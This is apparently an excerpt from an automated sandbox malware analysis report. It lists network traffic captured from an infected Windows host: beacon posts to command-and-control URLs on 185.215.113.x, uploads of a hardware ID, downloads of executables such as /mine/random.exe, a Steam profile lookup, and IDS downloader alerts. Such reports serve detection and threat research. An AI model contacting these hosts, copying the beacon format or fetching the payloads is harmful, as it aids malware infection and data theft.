Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDBGHJKFIDHJJJEBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------AFHDBGHJKFIDHJJJEBKEContent-Disposition: form-data; name="build"doma------AFHDBGHJKFIDHJJJEBKE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 4b 4a 4b 4b 4b 4a 4a 4a 4b 4a 4b 46 48 4a 4a 4a 4a 2d 2d 0d 0a Data Ascii: ------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------DHJKJKKKJJJKJKFHJJJJContent-Disposition: form-data; name="build"doma------DHJKJKKKJJJKJKFHJJJJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 46 38 37 44 31 37 38 46 41 43 33 33 34 33 34 31 32 31 34 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="hwid"93F87D178FAC3343412148------DAECFIJDAAAKECBFCGHIContent-Disposition: form-data; name="build"doma------DAECFIJDAAAKECBFCGHI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 39 37 38 42 36 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB22978B65C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49763 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49868 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49900 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49932 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49961 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49961 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:50085 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\1000994001\d7c50276ff.exe Code function: 12_2_00FDCE44 InternetReadFile,SetEvent,GetLastError,SetEvent, 12_2_00FDCE44
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
